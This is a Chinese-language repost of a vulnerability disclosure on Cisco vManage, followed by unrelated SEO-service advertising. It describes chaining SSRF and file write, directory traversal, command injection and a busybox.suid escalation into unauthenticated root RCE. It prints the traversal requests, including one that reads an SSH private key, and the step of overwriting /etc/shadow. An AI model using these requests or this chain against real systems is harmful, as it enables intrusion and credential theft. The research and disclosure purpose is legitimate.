96SEO 2026-02-19 19:13 21
vManage中的四个安全漏洞,包括SSRF+任意文件写入、未授权文件读取+目录遍历、命令注入和权限提升漏洞,攻击者可通过组合利用这些漏洞实现未授权的远程代码执行并获取root权限。

id="sd-pwn--第3部分--cisco-vmanage--又一天又一次网络接管">SD-PWN
本文继续我们的SD-WAN之旅。
如果您还没有阅读第1和第2部分,强烈建议您查看一下。
简而言之,我们在SD-WAN市场的四个主要产品中发现了关键的无认证RCE漏洞,这次我们将讨论Cisco
id="cisco-viptela-vmanage">Cisco
SD-WAN基础设施的核心,管理网络中的所有不同端点。
由于SD-WAN设计的集中式特性,从安全角度来看,vManage是一个单点故障。
通过串联4个不同的漏洞,我们能够在vManage机器上获得无认证的root权限RCE,这些机器通常托管在公司的云环境中。
攻击者不需要任何先前的配置知识即可利用这些漏洞。
SD-WAN解决方案,请紧急更新您的设备。
最新的固件已经包含了下面列出的所有问题的补丁。
系统的初始攻击向量是运行在vManage机器443端口上的Web管理服务器。
该Web服务器使用JBoss框架运行Java小程序。
Web管理接口的无认证攻击面在web.xml文件中列出,明确定义了所有可访问的URL路径。
id="ssrf--任意文件写入--cve-202027128">SSRF
在查看可能的入口点时,我们注意到了/dataservice入口点。
我们不确定代码的确切意图,但我们的假设是不同的端点使用dataservice
/dataservice/statistics/download/dr/filelist处理程序负责下载系统中两台机器之间的统计信息。
它接收相邻机器的IP地址和统计文件名,并下载以供后续使用。
完全没有进行用户输入验证,导致了多个漏洞。
首先,任何IP都可以通过sourcevManageIp参数传递给处理程序,允许进行SSRF攻击。
其次,token和fileType参数中的目录遍历允许攻击者将上述数据下载到任何目标路径,甚至可以覆盖现有文件。
服务器以vmanage用户身份运行,允许覆盖一些有趣的文件。
此外,该处理程序没有受到任何CSRF机制的保护。
POST/dataservice/statistics/download/dr/filelist
"fileType":"/../../../../../../../tmp/",
"sourcevManageIp":"1.2.3.4:12345",
"token":"../../../../../../../../../../../"}]}
https://1.2.3.4:12345/dataservice/statistics/download/remoteprocessing/file/../../../../../../../dropped.bin并将文件内容写入/opt/data/app-server/statistics/queue-0//../../../../../../../tmp/dropped.bin。
尽管这是一个可能被利用到RCE的关键漏洞,但它不是最终利用链的一部分。
/dataservice/disasterrecovery/download/token/。
它接收一个参数
要读取的文件...再次,没有执行用户输入验证,允许进行易于利用的目录遍历。
攻击者能够读取vManage用户可访问的任何文件。
GET/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fviptela%2F.ssh%2Fid_dsa
将读取/etc/viptela/.ssh/id_dsa的内容。
/etc/viptela/.ssh/id_dsa是用于SSH连接的秘密私钥,具有vmanage用户权限即可读取。
它允许攻击者以vmanage-admin身份通过SSH连接。
vmanage-admin的登录二进制文件是viptela_cli,就像admin一样,尽管vmanage-admin无法访问常规的CLI控制台。
这是在viptela_cli的main函数中决定的,该函数验证用户名。
否则,用户可以通过SSH连接发送单个命令,这提供了一些攻击面。
id="viptela_cli中的命令注入--cve-202027129">viptela_cli中的命令注入
使用上述SSH密钥登录后,viptela_cli解析用户提供的命令。
通过SSH连接发送的任何命令在执行前都会经过验证。
-f开头的命令。
不幸的是,对命令的其余部分没有执行任何清理,允许攻击者使用分号注入另一个命令。
scp上面的命令将以vmanage-admin用户身份运行。
id="使用busyboxsuid进行权限提升--cve-202026074">使用busybox.suid进行权限提升
在寻找系统中提升权限的不同选项时,我们注意到了一个特殊的suid文件
busybox.suid。
文件系统中的SUID位将在每次执行时将二进制文件的权限提升为root。
busybox.suid允许以root身份运行多个busybox小程序。
一个有趣的小程序是tftp,它允许使用tftp协议向系统上传和下载文件。
没有对目标路径进行验证,使恶意用户能够以root身份用任何给定数据覆盖任何文件。
这使得攻击者能够完全控制系统。
一个基本的例子是用新的root密码覆盖/etc/shadow文件,然后简单地运行su来获得root访问权限。
busybox.suid的tftp小程序覆盖/etc/shadowsu命令获得root命令执行请注意,这只是利用这些漏洞的一种方式。
可能会找到其他可能更简单的利用链。
Labs要感谢Cisco及其PSIRT在报告和修复这些漏洞过程中的出色沟通。
请确保在LinkedIn上关注我们,或通过contact@realmodelabs.com联系我们,以获取下一个SD-PWN漏洞帖子。
如果您有兴趣对您的某个产品进行安全审计,请联系我们。
我们的团队由最高水平的研究人员组成,在发现最难以捉摸的漏洞方面有着良好的记录。
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-file-Y2JSRNRb
漏洞2
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-traversal-hQh24tmk
漏洞3
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-privilege-zPmMf73k
漏洞4
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-escalation-Jhqs5Skf
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
data-src="https://i.imgs.ovh/2025/06/21/AejG6.png"
data-src="https://i.imgs.ovh/2025/06/21/AeaMp.jpeg"
作为专业的SEO优化服务提供商,我们致力于通过科学、系统的搜索引擎优化策略,帮助企业在百度、Google等搜索引擎中获得更高的排名和流量。我们的服务涵盖网站结构优化、内容优化、技术SEO和链接建设等多个维度。
| 服务项目 | 基础套餐 | 标准套餐 | 高级定制 |
|---|---|---|---|
| 关键词优化数量 | 10-20个核心词 | 30-50个核心词+长尾词 | 80-150个全方位覆盖 |
| 内容优化 | 基础页面优化 | 全站内容优化+每月5篇原创 | 个性化内容策略+每月15篇原创 |
| 技术SEO | 基本技术检查 | 全面技术优化+移动适配 | 深度技术重构+性能优化 |
| 外链建设 | 每月5-10条 | 每月20-30条高质量外链 | 每月50+条多渠道外链 |
| 数据报告 | 月度基础报告 | 双周详细报告+分析 | 每周深度报告+策略调整 |
| 效果保障 | 3-6个月见效 | 2-4个月见效 | 1-3个月快速见效 |
我们的SEO优化服务遵循科学严谨的流程,确保每一步都基于数据分析和行业最佳实践:
全面检测网站技术问题、内容质量、竞争对手情况,制定个性化优化方案。
基于用户搜索意图和商业目标,制定全面的关键词矩阵和布局策略。
解决网站技术问题,优化网站结构,提升页面速度和移动端体验。
创作高质量原创内容,优化现有页面,建立内容更新机制。
获取高质量外部链接,建立品牌在线影响力,提升网站权威度。
持续监控排名、流量和转化数据,根据效果调整优化策略。
基于我们服务的客户数据统计,平均优化效果如下:
我们坚信,真正的SEO优化不仅仅是追求排名,而是通过提供优质内容、优化用户体验、建立网站权威,最终实现可持续的业务增长。我们的目标是与客户建立长期合作关系,共同成长。
Demand feedback